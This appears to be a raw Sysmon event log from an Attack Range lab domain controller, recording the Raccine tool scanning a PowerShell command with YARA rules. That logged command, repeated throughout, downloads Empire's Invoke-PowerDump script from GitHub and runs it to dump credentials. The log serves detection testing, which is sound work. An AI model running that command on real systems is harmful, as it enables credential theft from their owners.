-d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""$Env:Temp\PowerDump.ps1\"" Import-Module \""$Env:Temp\PowerDump.ps1\"" Invoke-PowerDump} 10341000x80000000000000002164171Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.974{9DBE88B5-3BB7-61B2-5D05-010000000E02}71448188C:\Windows\system32\conhost.exe{9DBE88B5-3BB7-61B2-5C05-010000000E02}4856C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164165Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.962{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-3BB7-61B2-5C05-010000000E02}4856C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164164Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.962{9DBE88B5-3BB7-61B2-4805-010000000E02}66124980C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BB7-61B2-5C05-010000000E02}4856C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164163Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.961{9DBE88B5-3BB7-61B2-5C05-010000000E02}4856C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\powershell_loaders.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacF32B.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {Write-Host \''STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\'' -fore greenSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction IgnoreInvoke-Webrequest -Uri \''https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\'' -UseBasicParsing -OutFile \''$Env:Temp\PowerDump.ps1\''Import-Module \''$Env:Temp\PowerDump.ps1\''Invoke-PowerDump} p} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""$Env:Temp\PowerDump.ps1\"" Import-Module \""$Env:Temp\PowerDump.ps1\"" Invoke-PowerDump} 10341000x80000000000000002164160Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.945{9DBE88B5-3BB7-61B2-5B05-010000000E02}64681788C:\Windows\system32\conhost.exe{9DBE88B5-3BB7-61B2-5A05-010000000E02}7504C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164154Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.933{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-3BB7-61B2-5A05-010000000E02}7504C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164153Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.933{9DBE88B5-3BB7-61B2-4805-010000000E02}66124980C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BB7-61B2-5A05-010000000E02}7504C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164152Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.933{9DBE88B5-3BB7-61B2-5A05-010000000E02}7504C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\other_0xa9five_poc.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacF32B.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {Write-Host \''STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\'' -fore greenSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction IgnoreInvoke-Webrequest -Uri \''https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\'' -UseBasicParsing -OutFile \''$Env:Temp\PowerDump.ps1\''Import-Module \''$Env:Temp\PowerDump.ps1\''Invoke-PowerDump} p} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""$Env:Temp\PowerDump.ps1\"" Import-Module \""$Env:Temp\PowerDump.ps1\"" Invoke-PowerDump} 10341000x80000000000000002164148Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.917{9DBE88B5-3BB7-61B2-5905-010000000E02}68524488C:\Windows\system32\conhost.exe{9DBE88B5-3BB7-61B2-5805-010000000E02}5148C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164142Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.904{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-3BB7-61B2-5805-010000000E02}5148C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164141Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.904{9DBE88B5-3BB7-61B2-4805-010000000E02}66124980C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BB7-61B2-5805-010000000E02}5148C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164140Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.904{9DBE88B5-3BB7-61B2-5805-010000000E02}5148C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_revil.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacF32B.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {Write-Host \''STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\'' -fore greenSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction IgnoreInvoke-Webrequest -Uri \''https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\'' -UseBasicParsing -OutFile \''$Env:Temp\PowerDump.ps1\''Import-Module \''$Env:Temp\PowerDump.ps1\''Invoke-PowerDump} p} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""$Env:Temp\PowerDump.ps1\"" Import-Module \""$Env:Temp\PowerDump.ps1\"" Invoke-PowerDump} 10341000x80000000000000002164137Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.888{9DBE88B5-3BB7-61B2-5705-010000000E02}61927872C:\Windows\system32\conhost.exe{9DBE88B5-3BB7-61B2-5605-010000000E02}7588C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164131Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.876{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-3BB7-61B2-5605-010000000E02}7588C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164130Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.876{9DBE88B5-3BB7-61B2-4805-010000000E02}66124980C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BB7-61B2-5605-010000000E02}7588C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164129Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.876{9DBE88B5-3BB7-61B2-5605-010000000E02}7588C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_exchange_cryptominer.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacF32B.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {Write-Host \''STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\'' -fore greenSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction IgnoreInvoke-Webrequest -Uri \''https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\'' -UseBasicParsing -OutFile \''$Env:Temp\PowerDump.ps1\''Import-Module \''$Env:Temp\PowerDump.ps1\''Invoke-PowerDump} p} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""$Env:Temp\PowerDump.ps1\"" Import-Module \""$Env:Temp\PowerDump.ps1\"" Invoke-PowerDump} 10341000x80000000000000002164125Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.859{9DBE88B5-3BB7-61B2-5505-010000000E02}42928052C:\Windows\system32\conhost.exe{9DBE88B5-3BB7-61B2-5405-010000000E02}7176C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164119Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.847{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-3BB7-61B2-5405-010000000E02}7176C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164118Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.847{9DBE88B5-3BB7-61B2-4805-010000000E02}66124980C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BB7-61B2-5405-010000000E02}7176C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164117Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.847{9DBE88B5-3BB7-61B2-5405-010000000E02}7176C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_emotet.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacF32B.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {Write-Host \''STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\'' -fore greenSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction IgnoreInvoke-Webrequest -Uri \''https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\'' -UseBasicParsing -OutFile \''$Env:Temp\PowerDump.ps1\''Import-Module \''$Env:Temp\PowerDump.ps1\''Invoke-PowerDump} p} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""$Env:Temp\PowerDump.ps1\"" Import-Module \""$Env:Temp\PowerDump.ps1\"" Invoke-PowerDump} 10341000x80000000000000002164114Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.831{9DBE88B5-3BB7-61B2-5305-010000000E02}74486708C:\Windows\system32\conhost.exe{9DBE88B5-3BB7-61B2-5205-010000000E02}7056C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164098Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.819{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-3BB7-61B2-5205-010000000E02}7056C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164097Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.819{9DBE88B5-3BB7-61B2-4805-010000000E02}66124980C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BB7-61B2-5205-010000000E02}7056C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164096Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.819{9DBE88B5-3BB7-61B2-5205-010000000E02}7056C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_darkside.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacF32B.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {Write-Host \''STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\'' -fore greenSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction IgnoreInvoke-Webrequest -Uri \''https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\'' -UseBasicParsing -OutFile \''$Env:Temp\PowerDump.ps1\''Import-Module \''$Env:Temp\PowerDump.ps1\''Invoke-PowerDump} p} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""$Env:Temp\PowerDump.ps1\"" Import-Module \""$Env:Temp\PowerDump.ps1\"" Invoke-PowerDump} 10341000x80000000000000002164093Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 